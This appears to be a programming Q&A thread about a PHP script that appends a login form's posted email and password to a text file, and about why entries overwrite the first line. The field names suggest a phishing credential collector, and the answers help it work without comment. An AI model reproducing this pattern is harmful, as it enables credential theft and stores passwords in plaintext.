# Problem new line doesn't create and replace the first line

Tags: php, file, fopen

```
  if(isset($_POST['login_source']))
  { 
    $email = $pass = "";
    // get email id   
    $email = $_POST["email"];
    // get password
    $myfile = fopen("data.txt", "a") or die("Unable to open file!");
    $pass = $_POST["pass"];
    $txt = "$email:$pass\n";
    fwrite($myfile, $txt);
    fclose($myfile);

  }
```

He doesn't create a new line in data.txt and he replace the first line and i try this on localhost

Comment: https://www.php.net/manual/en/function.fwrite.php

Answer (score 1):

Open the file in append mode:

```
fopen("data.txt", "a")
```

Answer (score 0):

**The problem is in your [file mode usage](https://www.php.net/manual/en/function.fopen.php) `fopen("data.txt","xxxx")` so check this table,**

| Mode | Description |
| --- | --- |
| `"r"` | **Opens a file for reading. The file must exist.** |
| `"w"` | **Creates an empty file for writing. If a file with the same name already exists, its content is erased and the file is considered as a new empty file.** |
| `"a"` | Appends to a file. Writing operations, append data at the end of the file. The file is created if it does not exist. |
| `"r+"` | Opens a file to update both reading and writing. The file must exist. |
| `"w+"` | Creates an empty file for both reading and writing. |
| `"a+"` | Opens a file for reading and appending. |
| `"rb"` | Opens a binary file for reading. The file must exist. |
| `"wb"` | Creates an empty binary file for writing. If the file exists, its contents are cleared unless it is a logical file. |
| `"ab"` | Opens a binary file in append mode for writing at the end of the file. The fopen function creates the file if it does not exist. |
| `"rb+"` | Opens a binary file for both reading and writing. The file must exist. |
| `"wb+"` | Creates an empty binary file for both reading and writing. If the file exists, its contents will be cleared unless it is a logical file. |
| `"ab+"` | Opens a binary file in append mode for writing at the end of the file. The fopen() function creates the file if it does not exist. |

**For solving your problem you can use appending modes `a`, `a+`, `ab`, `ab+`.**

**Change your code like this:**

```
if(isset($_POST['login']))
{ 
    $email = $pass = "";
    // get email id   
    $email = $_POST["email"];
    // get password
    $myfile = fopen("data.txt", "a") or die("Unable to open file!");
    $pass = $_POST["pass"];
    $txt = "$email:$pass\n";
    fwrite($myfile, $txt);
    fclose($myfile);
}
```